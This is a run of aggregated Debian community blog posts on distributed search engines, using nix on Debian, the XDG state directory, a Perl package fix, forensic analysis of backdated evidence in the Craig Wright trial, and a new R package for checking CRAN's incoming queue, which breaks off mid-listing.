<p>The speaker, however, did not mention <a href="https://en.wikipedia.org/wiki/Distributed_search_engine">that</a> <a href="https://wiki.p2pfoundation.net/Distributed_Search_Engines">there</a> <a href="https://blog.florence.chat/a-distributed-search-engine-for-the-distributed-web-39c377dc700e">have</a> <a href="https://web.archive.org/web/20230902052010/https://hackernoon.com/is-the-concept-of-a-distributed-search-engine-potent-enough-to-challenge-googles-dominance-l1s44t2">already</a> <a href="https://web.archive.org/web/20200914192255/https://github.com/nvasilakis/yippee">been</a> <a href="https://www.techdirt.com/2014/07/08/distributed-search-engines-why-we-need-them-post-snowden-world/">many</a> <a href="https://github.com/kearch/kearch">attempts</a> at building distributed search engines. So why do I think that such an attempt could finally succeed?</p>
<ul>
<li>More people are searching for alternatives to Google.</li>
<li>Mainstream hard disks are incredibly big.</li>
<li>Mainstream internet connections are incredibly fast.</li>
<li>Google is bleeding talent.</li>
<li>Most of the building blocks are available as free software.</li>
<li>“Success” depends on your definition…</li>
</ul>
<p>My definition of success is:</p>
<blockquote>
<p>A mildly technical computer user (able to install software) has access to a search engine that provides them with superior search results compared to Google for at least a few predefined areas of interest.</p>
</blockquote>
<p>The exact algorithm used by Google Search to rank websites is a secret even to most Googlers. However, I assume that it relies heavily on big data.</p>
<p>A distributed search engine, however, can instead rely on user input. Every admin of a node seeds the node's ranking with their personal selection of trusted sites. They connect their node with the nodes of people they trust. This results in a web of (transitive) trust, much like PGP.</p>
<p>Imagine you are searching for something in a world without computers: you ask the people around you, and they probably forward your question to their peers.</p>
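<p>The seeding-plus-transitive-trust idea above can be sketched in a few lines. This is a hypothetical illustration, not code from Populus:DezInV; the names, structure, and damping factor are all invented. Each node assigns scores to the sites its admin trusts directly, and opinions from trusted peer nodes are averaged in with a damping factor, so trust decays along the chain:</p>

```python
# Sketch of transitive trust ranking: direct seeds plus damped peer opinions.
# All names and the damping factor are illustrative, not from any real project.

def rank(site, node, trust_graph, seeds, depth=2, damping=0.5):
    """Score a site from one node's perspective.

    seeds[node] maps sites to this admin's hand-picked scores;
    trust_graph[node] lists peer nodes this node trusts.
    Peer opinions are averaged and damped, so distant trust counts less.
    """
    score = seeds.get(node, {}).get(site, 0.0)
    if depth == 0:
        return score
    peers = trust_graph.get(node, [])
    if peers:
        peer_avg = sum(
            rank(site, p, trust_graph, seeds, depth - 1, damping) for p in peers
        ) / len(peers)
        score += damping * peer_avg
    return score

trust_graph = {"alice": ["bob"], "bob": ["carol"], "carol": []}
seeds = {
    "alice": {"wiki.example.org": 1.0},
    "bob": {"blog.example.net": 1.0},
    "carol": {"docs.example.com": 1.0},
}

# Alice sees her own seed at full weight, bob's damped once, carol's twice.
print(rank("wiki.example.org", "alice", trust_graph, seeds))  # 1.0
print(rank("blog.example.net", "alice", trust_graph, seeds))  # 0.5
print(rank("docs.example.com", "alice", trust_graph, seeds))  # 0.25
```

<p>The depth limit doubles as cycle protection; a real implementation would need proper cycle handling and a smarter aggregation than a plain average.</p>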
<p>I already had a look at <a href="https://yacy.net">YaCy</a>. It is active, somewhat usable and has a friendly maintainer. Unfortunately, I consider the codebase not worth the effort. Nevertheless, YaCy is a good example that decentralized search software can be built even by a small team or just one person.</p>
<p>I myself started working on software in Haskell and keep my notes here: <a href="https://de.populus.wiki/wiki/Populus:DezInV">Populus:DezInV</a>. Since I’m learning Haskell along the way, there is nothing to see there yet. Additionally, I took a yak-shaving break to learn <a>nix</a>.</p>
<p>By the way: <a href="https://thepeoplesvoice.tv/google-lite-duckduckgo-signs-secret-deal-with-bill-gates-to-track-users-online/">DuckDuckGo is not the alternative</a>. And while I would encourage you to also try Yandex for a second opinion, I don’t consider this a solution.</p>2024-03-17T10:13:40+00:00Thomas KochThomas Koch: Using nix package manager in Debian
https://blog.koch.ro/posts/2024-01-16-using-nix-package-manager-in-debian.html
<div class="info">
Posted on January 16, 2024
</div>
<div class="info">
Tags: <a href="https://blog.koch.ro/tags/debian.html" title="All pages tagged 'debian'.">debian</a>, <a href="https://blog.koch.ro/tags/free%20software.html" title="All pages tagged 'free software'.">free software</a>, <a href="https://blog.koch.ro/tags/nix.html" title="All pages tagged 'nix'.">nix</a>, <a href="https://blog.koch.ro/tags/life.html" title="All pages tagged 'life'.">life</a>
</div>
<p>The <a href="https://nixos.org">nix</a> package manager is <a href="https://tracker.debian.org/pkg/nix">available in Debian</a> since <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=877019">May 2020</a>. Why would one use it in Debian?</p>
<ul>
<li>learn about nix</li>
<li>install software that might not be available in Debian</li>
<li>install software without root access</li>
<li>declare software necessary for a user’s environment inside <code>$HOME/.config</code></li>
</ul>
<p>Especially the last point nagged me every time I set up a new Debian installation. My emacs configuration and my desktop setup expect certain software to be installed.</p>
<p>Please be aware that I’m a beginner with nix and that my config might not follow best practice. Additionally, many nix users are already using the new flakes feature of nix, which I’m still learning about.</p>
<p>So I’ve got this file at <code>.config/nixpkgs/config.nix</code><a class="footnote-ref" href="https://blog.koch.ro/tags/debian.atom.xml#fn1" id="fnref1"><sup>1</sup></a>:</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode nix"><code class="sourceCode bash"><span id="cb1-1"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-1"></a><span class="ex">with</span> (import <span class="op"><</span>nixpkgs<span class="op">></span> {});</span>
<span id="cb1-2"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-2"></a><span class="kw">{</span></span>
<span id="cb1-3"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-3"></a> <span class="ex">packageOverrides</span> = pkgs: with pkgs<span class="kw">;</span> <span class="kw">{</span></span>
<span id="cb1-4"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-4"></a> <span class="ex">thk-emacsWithPackages</span> = (pkgs.emacsPackagesFor emacs-gtk)<span class="ex">.emacsWithPackages</span> (</span>
<span id="cb1-5"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-5"></a> <span class="ex">epkgs</span>:</span>
<span id="cb1-6"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-6"></a> <span class="kw">(</span><span class="ex">with</span> epkgs.elpaPackages<span class="kw">;</span><span class="bu"> [</span></span>
<span id="cb1-7"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-7"></a> ace-window</span>
<span id="cb1-8"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-8"></a> company</span>
<span id="cb1-9"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-9"></a> org</span>
<span id="cb1-10"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-10"></a> use-package</span>
<span id="cb1-11"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-11"></a> ]) ++ (with epkgs.melpaPackages; [</span>
<span id="cb1-12"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-12"></a> editorconfig</span>
<span id="cb1-13"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-13"></a> flycheck</span>
<span id="cb1-14"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-14"></a> haskell-mode</span>
<span id="cb1-15"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-15"></a> magit</span>
<span id="cb1-16"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-16"></a> nix-mode</span>
<span id="cb1-17"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-17"></a> paredit</span>
<span id="cb1-18"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-18"></a> rainbow-delimiters</span>
<span id="cb1-19"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-19"></a> treemacs</span>
<span id="cb1-20"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-20"></a> visual-fill-column</span>
<span id="cb1-21"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-21"></a> yasnippet-snippets</span>
<span id="cb1-22"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-22"></a> ]) ++ [ # From main packages set</span>
<span id="cb1-23"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-23"></a> ]</span>
<span id="cb1-24"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-24"></a> );</span>
<span id="cb1-25"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-25"></a></span>
<span id="cb1-26"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-26"></a> userPackages <span class="ot">=</span> buildEnv {</span>
<span id="cb1-27"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-27"></a> extraOutputsToInstall <span class="ot">=</span> [ <span class="st">"doc"</span> <span class="st">"info"</span> <span class="st">"man"</span><span class="bu"> ]</span>;</span>
<span id="cb1-28"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-28"></a> <span class="ex">name</span> = <span class="st">"user-packages"</span><span class="kw">;</span></span>
<span id="cb1-29"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-29"></a> <span class="ex">paths</span> = [</span>
<span id="cb1-30"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-30"></a> <span class="ex">ghc</span></span>
<span id="cb1-31"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-31"></a> <span class="fu">git</span></span>
<span id="cb1-32"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-32"></a> <span class="kw">(</span><span class="ex">pkgs.haskell-language-server.override</span> { supportedGhcVersions = [ <span class="st">"94"</span> ]<span class="kw">;</span> }<span class="kw">)</span></span>
<span id="cb1-33"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-33"></a> <span class="ex">nix</span></span>
<span id="cb1-34"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-34"></a> <span class="ex">stack</span></span>
<span id="cb1-35"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-35"></a> <span class="ex">thk-emacsWithPackages</span></span>
<span id="cb1-36"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-36"></a> <span class="ex">tmux</span></span>
<span id="cb1-37"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-37"></a> <span class="ex">vcsh</span></span>
<span id="cb1-38"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-38"></a> <span class="ex">virtiofsd</span></span>
<span id="cb1-39"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-39"></a> ];</span>
<span id="cb1-40"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-40"></a> };</span>
<span id="cb1-41"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-41"></a> };</span>
<span id="cb1-42"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-42"></a>}</span></code></pre></div>
<p>Every time I change the file or want to receive updates, I do:</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb2-1"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb2-1"></a><span class="ex">nix-env</span> --install --attr nixpkgs.userPackages --remove-all</span></code></pre></div>
<p>You can see that I install nix with nix. This gives me a newer version than the one available in Debian stable. However, the nix-daemon still runs as the older binary from Debian. My dirty hack is to put this override in <code>/etc/systemd/system/nix-daemon.service.d/override.conf</code>:</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode ini"><code class="sourceCode ini"><span id="cb3-1"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb3-1"></a><span class="kw">[Service]</span></span>
<span id="cb3-2"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb3-2"></a><span class="dt">ExecStart</span><span class="ot">=</span></span>
<span id="cb3-3"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb3-3"></a><span class="dt">ExecStart</span><span class="ot">=</span><span class="st">@/home/thk/.local/state/nix/profile/bin/nix-daemon nix-daemon --daemon</span></span></code></pre></div>
<p>I’m not too interested in a cleaner way since I hope to fully migrate to Nix anyway.</p>
<section class="footnotes">
<hr />
<ol>
<li id="fn1"><p>Note the <code>nixpkgs</code> in the path. This is not a config file for <code>nix</code> the package manager but for the <a href="https://github.com/NixOS/nixpkgs">nix package collection</a>. See the <a href="https://nixos.org/manual/nixpkgs/stable/#chap-packageconfig">nixpkgs manual</a>.<a class="footnote-back" href="https://blog.koch.ro/tags/debian.atom.xml#fnref1">↩︎</a></p></li>
</ol>
</section>2024-03-17T10:13:40+00:00Thomas KochThomas Koch: Chromium gtk-filechooser preview size
https://blog.koch.ro/posts/2024-01-09-chromium-gtk-filechooser-preview-size.html
<div class="info">
Posted on January 9, 2024
</div>
<div class="info">
Tags: <a href="https://blog.koch.ro/tags/debian.html" title="All pages tagged 'debian'.">debian</a>, <a href="https://blog.koch.ro/tags/free%20software.html" title="All pages tagged 'free software'.">free software</a>, <a href="https://blog.koch.ro/tags/life.html" title="All pages tagged 'life'.">life</a>
</div>
<p>I wanted to report this issue in <a href="https://bugs.chromium.org/p/chromium/issues/wizard">Chromium’s issue tracker</a>, but it gave me:</p>
<blockquote>
<p>“Something went wrong, please try again later.”</p>
</blockquote>
<p>Ok, then at least let me reply to this <a href="https://askubuntu.com/questions/788408/open-upload-file-dialogue-make-file-preview-larger">askubuntu question</a>. But my attempt to sign up with my Launchpad account gave me:</p>
<blockquote>
<p>“Launchpad Login Failed. Please try logging in again.”</p>
</blockquote>
<p>I refrain from commenting on this to not violate some code of conduct.</p>
<p>So this is what I wanted to write:</p>
<blockquote>
<p><strong>GTK file chooser image preview size should be configurable</strong></p>
<p>The file chooser that appears when uploading a file (e.g. an image to Google Fotos) learned to show a preview in <a href="https://bugs.chromium.org/p/chromium/issues/detail?id=15500">issue 15500</a>.</p>
<p>The preview image size is hard coded to 256x512 in kPreviewWidth and kPreviewHeight in <a href="https://source.chromium.org/chromium/chromium/src/+/main:ui/gtk/select_file_dialog_linux_gtk.cc;drc=d0b88a2bb42b34c43720c0e9ee2543e4c9df3071;l=160"><code>ui/gtk/select_file_dialog_linux_gtk.cc</code></a>.</p>
<p>Please make the size configurable.</p>
<p>On high DPI screens the images are too small to be of much use.</p>
</blockquote>
<p>Yes, I should not use chromium anymore.</p>2024-03-17T10:13:40+00:00Thomas KochThomas Koch: Good things come ... state folder
https://blog.koch.ro/posts/2024-01-02-good-things-state-folder.html
<div class="info">
Posted on January 2, 2024
</div>
<div class="info">
Tags: <a href="https://blog.koch.ro/tags/debian.html" title="All pages tagged 'debian'.">debian</a>, <a href="https://blog.koch.ro/tags/free%20software.html" title="All pages tagged 'free software'.">free software</a>, <a href="https://blog.koch.ro/tags/life.html" title="All pages tagged 'life'.">life</a>
</div>
<p>Just a little while ago (10 years) <a href="https://lists.freedesktop.org/pipermail/xdg/2012-December/012598.html">I proposed</a> the <a href="https://web.archive.org/web/20161127085425/http://koch.ro/blog/index.php?/archives/163-Waiting-for-a-STATE-folder-in-the-XDG-basedir-spec.html">addition of a state folder</a> to the <a href="https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html">XDG basedir specification</a> and expanded the article <a href="https://wiki.debian.org/XDGBaseDirectorySpecification">XDGBaseDirectorySpecification</a> in the Debian wiki. Recently <a href="https://www.reddit.com/r/linux/comments/ny34vs/new_xdg_state_home_in_xdg_base_directory_spec/?rdt=53526">I learned</a> that version 0.8 (from May 2021) of the spec finally includes a state folder.</p>
<p>Granted, I wasn’t the <a href="https://lists.freedesktop.org/pipermail/xdg/2009-February/010191.html">first to have this idea</a> (2009), nor the one who actually <a href="https://lists.freedesktop.org/archives/xdg/2021-February/014434.html">made it happen</a>.</p>
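<p>For application authors, honoring the new directory works like the other basedir variables: use <code>$XDG_STATE_HOME</code> when it is set to an absolute path, else fall back to <code>~/.local/state</code>. A minimal Python sketch (the app name is a placeholder):</p>

```python
import os

def xdg_state_home():
    """Resolve the state directory per XDG Base Directory spec 0.8:
    $XDG_STATE_HOME if set to an absolute path, else ~/.local/state.
    (The spec says non-absolute values must be ignored.)"""
    path = os.environ.get("XDG_STATE_HOME", "")
    if not os.path.isabs(path):
        path = os.path.expanduser("~/.local/state")
    return path

# State data: things like history files and logs, which should persist
# across restarts but are neither portable config nor user documents.
print(os.path.join(xdg_state_home(), "myapp", "history"))
```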
<p>Now, please go ahead and use it! Thank you.</p>2024-03-17T10:13:40+00:00Thomas KochPatryk Cisek: OpenPGP Paper Backup
https://prezu.ca/post/openpgp-paper-backup/
openpgp-paper-backup I’ve been using OpenPGP through GnuPG since the early 2000s. It’s an essential part of a Debian Developer’s workflow. We use it regularly to authenticate package uploads and votes. Proper backups of that key are really important.
Up until recently, the only reliable option for me was backing up a tarball of my ~/.gnupg offline on a few flash drives. This approach is better than nothing, but it’s not nearly as reliable as I’d like it to be.2024-03-15T21:42:39+00:00Patryk CisekGregor Herrmann: teamwork in practice
https://info.comodo.priv.at/blog/teamwork_in_practice.html
<p>teamwork, or: why I love the Debian Perl Group:</p>
<p>elbrus has introduced a (very untypical) <a href="https://tracker.debian.org/pkg/libmediascan">package</a> into the
Debian Perl Group in 2022.</p>
<p>after changes of the default compiler options
<code>(-Werror=implicit-function-declaration)</code> in debian, it didn't
build any more & received an <a href="https://bugs.debian.org/1066249">RC bug</a>.</p>
<p>because I sometimes like challenges, I had a look at it & cobbled together
a patch. as I hardly speak any C, I sent my notes to the bug report
& (implicitly) asked for help. – & went out to meet a
friend.</p>
<p>when I came home, I found an email from ntyni, sent less than 2 hours
after my mail, where he friendly pointed out the issues with my patch
– & sent a corrected version.</p>
<p>all I needed to do was to adjust the patch & upload the package. one
more bug fixed, one less task for us, & elbrus can concentrate on more
important tasks :)<br /> thanks again, niko!</p>2024-03-14T22:10:53+00:00Gregor HerrmannMatthew Garrett: Digital forgeries are hard
https://mjg59.dreamwidth.org/69507.html
Closing arguments in the trial between various people and <a href="https://en.wikipedia.org/wiki/Craig_Steven_Wright">Craig Wright</a> over whether he's <a href="https://en.wikipedia.org/wiki/Satoshi_Nakamoto">Satoshi Nakamoto</a> are wrapping up today, amongst a bewildering array of presented evidence. But one utterly astonishing aspect of this lawsuit is that expert witnesses for <em>both</em> sides agreed that much of the digital evidence provided by Craig Wright was unreliable in one way or another, generally including indications that it wasn't produced at the point in time it claimed to be. And it's fascinating reading through the subtle (and, in some cases, not so subtle) ways that that's revealed.<br /><br />One of the pieces of evidence entered is screenshots of data from <a href="https://myob.com">Mind Your Own Business</a>, a business management product that's been around for some time. Craig Wright relied on screenshots of various entries from this product to support his claims around having controlled a meaningful number of bitcoin before he was publicly linked to being Satoshi. If these were authentic then they'd be strong evidence linking him to the mining of coins before Bitcoin's public availability. Unfortunately the screenshots themselves weren't contemporary - the metadata shows them being created in 2020. This wouldn't fundamentally be a problem (it's entirely reasonable to create new screenshots of old material), as long as it's possible to establish that the material shown in the screenshots was created at that point. Sadly, well.<br /><br />One part of the disclosed information was an email that contained a zip file that contained a raw database in the format used by MYOB. Importing that into the tool allowed an audit record to be extracted - this record showed that the relevant entries had been added to the database in 2020, shortly before the screenshots were created. 
This was, obviously, not strong evidence that Craig had held Bitcoin in 2009. This evidence was reported, and was responded to with a couple of additional databases that had an audit trail that was consistent with the dates in the records in question. Well, partially. The audit record included session data, showing an administrator logging into the database in 2011 and then, uh, logging out in 2023, which is rather more consistent with someone changing their system clock to 2011 to create an entry, and switching it back to present day before logging out. In addition, the audit log included fields that didn't exist in versions of the product released before 2016, strongly suggesting that the entries dated 2009-2011 were created in software released after 2016. And even worse, the order of insertions into the database didn't line up with calendar time - an entry dated before another entry may appear in the database afterwards, indicating that it was created later. But even more obvious? The database schema used for these old entries corresponded to a version of the software released in 2023.<br /><br />This is all consistent with the idea that these records were created after the fact and backdated to 2009-2011, and that after this evidence was made available further evidence was created and backdated to obfuscate that. In an unusual turn of events, during the trial Craig Wright introduced further evidence in the form of a chain of emails to his former lawyers that indicated he had provided them with login details to his MYOB instance in 2019 - before the metadata associated with the screenshots. The implication isn't entirely clear, but it suggests that either they had an opportunity to examine this data before the metadata suggests it was created, or that they faked the data? So, well, the obvious thing happened, and his former lawyers were asked whether they received these emails. The chain consisted of three emails, two of which they confirmed they'd received. 
And they received a third email in the chain, but it was different to the one entered in evidence. And, uh, weirdly, they'd received a copy of the email that was submitted - but they'd received it a few days earlier. In 2024.<br /><br />And again, the forensic evidence is helpful here! It turns out that the email client used associates a timestamp with any attachments, which in this case included an image in the email footer - and the mysterious time travelling email had a timestamp in 2024, not 2019. This was created by the client, so was consistent with the email having been sent in 2024, not being sent in 2019 and somehow getting stuck somewhere before delivery. The date header indicates 2019, as do encoded timestamps in the MIME headers - consistent with the mail being sent by a computer with the clock set to 2019.<br /><br />But there's a very weird difference between the copy of the email that was submitted in evidence and the copy that was located afterwards! The first included a header inserted by gmail that included a 2019 timestamp, while the latter had a 2024 timestamp. Is there a way to determine which of these could be the truth? It turns out there is! The format of that header changed in 2022, and the version in the email is the new version. The version with the 2019 timestamp is anachronistic - the format simply doesn't match the header that gmail would have introduced in 2019, suggesting that an email sent in 2022 or later was modified to include a timestamp of 2019.<br /><br />This is by no means the only indication that Craig Wright's evidence may be misleading (there's the whole argument that the Bitcoin white paper was written in LaTeX when general consensus is that it's written in OpenOffice, given that's what the metadata claims), but it's a lovely example of a more general issue.<br /><br />Our technology chains are complicated. So many moving parts end up influencing the content of the data we generate, and those parts develop over time. 
It's fantastically difficult to generate an artifact now that precisely corresponds to how it would look in the past, even if we go to the effort of installing an old OS on an old PC and setting the clock appropriately (are you sure you're going to be able to mimic an entirely period appropriate patch level?). Even the version of the font you use in a document may indicate it's anachronistic. I'm pretty good at computers and I no longer have any belief I could fake an old document.<br /><br />(References: <a href="https://www.dropbox.com/scl/fo/4y3gdele4foy15006z8ch/h?rlkey=scs42wew1o3vwfv0nduhc43dm&dl=0">this Dropbox</a>, under "Expert reports", "Patrick Madden". Initial MYOB data is in "Appendix PM7", further analysis is in "Appendix PM42", email analysis is "Sixth Expert Report of Mr Patrick Madden")<br /><br /><img alt="comment count unavailable" height="12" src="https://www.dreamwidth.org/tools/commentcount?user=mjg59&ditemid=69507" style="vertical-align: middle;" width="30" /> comments2024-03-14T09:11:32+00:00Matthew GarrettDirk Eddelbuettel: ciw 0.0.1 on CRAN: New Package!
http://dirk.eddelbuettel.com/blog/2024/03/13#ciw_0.0.1
<p>Happy to share that <a href="https://dirk.eddelbuettel.com/code/ciw.html">ciw</a> is now on <a href="https://cran.r-project.org">CRAN</a>! I had tooted a little bit
about it, <em>e.g.</em>, <a href="https://mastodon.social/@eddelbuettel/112016349028986595">here</a>.
What it provides is a single (efficient) function
<code>incoming()</code> which summarises the state of the incoming
directories at <a href="https://cran.r-project.org">CRAN</a>. I happen
to like having these things at my (shell) fingertips, so it goes along
with (still draft) <a href="https://github.com/eddelbuettel/littler/blob/master/inst/examples/ciw.r">wrapper
ciw.r</a> that will be part of the next <a href="https://github.com/eddelbuettel/littler">littler</a> release.</p>
<p>For example, when I do this right now as I type this, I see</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode sh"><code class="sourceCode bash"><span id="cb1-1"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-1" tabindex="-1"></a><span class="ex">edd@rob:~$</span> ciw.r</span>
<span id="cb1-2"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-2" tabindex="-1"></a> <span class="ex">Folder</span> Name Time Size Age</span>
<span id="cb1-3"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-3" tabindex="-1"></a> <span class="op"><</span>char<span class="op">></span> <span class="op"><</span>char<span class="op">></span> <span class="op"><</span>POSc<span class="op">></span> <span class="op"><</span>char<span class="op">></span> <span class="op"><</span>difftime<span class="op">></span></span>
<span id="cb1-4"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-4" tabindex="-1"></a><span class="ex">1:</span> waiting maximin_1.0-5.tar.gz 2024-03-13 22:22:00 20K 2.48 hours</span>
<span id="cb1-5"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-5" tabindex="-1"></a><span class="ex">2:</span> inspect GofCens_0.97.tar.gz 2024-03-13 21:12:00 29K 3.65 hours</span>
<span id="cb1-6"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-6" tabindex="-1"></a><span class="ex">3:</span> inspect verbalisr_0.5.2.tar.gz 2024-03-13 20:09:00 79K 4.70 hours</span>
<span id="cb1-7"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-7" tabindex="-1"></a><span class="ex">4:</span> waiting rnames_1.0.1.tar.gz 2024-03-12 15:04:00 2.7K 33.78 hours</span>
<span id="cb1-8"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-8" tabindex="-1"></a><span class="ex">5:</span> waiting PCMBase_1.2.14.tar.gz 2024-03-10 12:32:00 406K 84.32 hours</span>
<span id="cb1-9"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-9" tabindex="-1"></a><span class="ex">6:</span> pending MPCR_1.1.tar.gz 2024-02-22 11:07:00 903K 493.73 hours</span>
<span id="cb1-10"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-10" tabindex="-1"></a><span class="ex">edd@rob:~$</span> </span></code></pre></div>
<p>which is rather compact as <a href="https://cran.r-project.org">CRAN</a> kept busy! This call runs in
about (or just over) one second, which includes launching
<code>r</code>. Good enough for me. From a well-connected EC2 instance
it is about 800ms on the command-line. When I do it from here inside an R
session it is maybe 700ms. And doing it over in Europe is faster still.
(I am using <code>ping=FALSE</code> for these to omit the default sanity
check of ‘can I haz networking?’ to speed things up. The check adds
another 200ms or so.)</p>
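<p>The gist of <code>incoming()</code> is easy to approximate: list each folder and report name, size, and age. A rough Python analogue of the table above, purely illustrative — the actual package is written in R and queries CRAN's incoming directories over the network, while this sketch only walks a local folder:</p>

```python
import os
import time

def summarize(folder):
    """List files in a local folder with size (bytes) and age (hours),
    newest first, loosely mimicking incoming()'s default age sort."""
    rows = []
    for name in os.listdir(folder):
        st = os.stat(os.path.join(folder, name))
        age_hours = (time.time() - st.st_mtime) / 3600.0
        rows.append((name, st.st_size, round(age_hours, 2)))
    # Sort ascending by age, i.e. most recently modified entries first.
    return sorted(rows, key=lambda r: r[2])
```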
<p>The function (and the wrapper) offer a ton of options too; this is
ridiculously easy to do thanks to the <a href="https://cloud.r-project.org/package=docopt">docopt</a>
package:</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode sh"><code class="sourceCode bash"><span id="cb2-1"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-1" tabindex="-1"></a><span class="ex">edd@rob:~$</span> ciw.r <span class="at">-x</span></span>
<span id="cb2-2"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-2" tabindex="-1"></a><span class="ex">Usage:</span> ciw.r [-h] [-x] [-a] [-m] [-i] [-t] [-p] [-w] [-r] [-s] [-n] [-u] [-l rows] [-z] [ARG...]</span>
<span id="cb2-3"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-3" tabindex="-1"></a></span>
<span id="cb2-4"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-4" tabindex="-1"></a><span class="ex">-m</span> <span class="at">--mega</span> use <span class="st">'mega'</span> mode of all folders <span class="er">(</span><span class="ex">see</span> <span class="at">--usage</span><span class="kw">)</span></span>
<span id="cb2-5"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-5" tabindex="-1"></a><span class="ex">-i</span> <span class="at">--inspect</span> visit <span class="st">'inspect'</span> folder</span>
<span id="cb2-6"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-6" tabindex="-1"></a><span class="ex">-t</span> <span class="at">--pretest</span> visit <span class="st">'pretest'</span> folder</span>
<span id="cb2-7"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-7" tabindex="-1"></a><span class="ex">-p</span> <span class="at">--pending</span> visit <span class="st">'pending'</span> folder</span>
<span id="cb2-8"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-8" tabindex="-1"></a><span class="ex">-w</span> <span class="at">--waiting</span> visit <span class="st">'waiting'</span> folder</span>
<span id="cb2-9"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-9" tabindex="-1"></a><span class="ex">-r</span> <span class="at">--recheck</span> visit <span class="st">'waiting'</span> folder</span>
<span id="cb2-10"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-10" tabindex="-1"></a><span class="ex">-a</span> <span class="at">--archive</span> visit <span class="st">'archive'</span> folder</span>
<span id="cb2-11"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-11" tabindex="-1"></a><span class="ex">-n</span> <span class="at">--newbies</span> visit <span class="st">'newbies'</span> folder</span>
<span id="cb2-12"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-12" tabindex="-1"></a><span class="ex">-u</span> <span class="at">--publish</span> visit <span class="st">'publish'</span> folder</span>
<span id="cb2-13"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-13" tabindex="-1"></a><span class="ex">-s</span> <span class="at">--skipsort</span> skip sorting of aggregate results by age</span>
<span id="cb2-14"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-14" tabindex="-1"></a><span class="ex">-l</span> <span class="at">--lines</span> rows print top <span class="st">'rows'</span> of the result object [default: 50]</span>
<span id="cb2-15"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-15" tabindex="-1"></a><span class="ex">-z</span> <span class="at">--ping</span> run the connectivity check first</span>
<span id="cb2-16"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-16" tabindex="-1"></a><span class="ex">-h</span> <span class="at">--help</span> show this help text</span>
<span id="cb2-17"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-17" tabindex="-1"></a><span class="ex">-x</span> <span class="at">--usage</span> show help and short example usage </span>
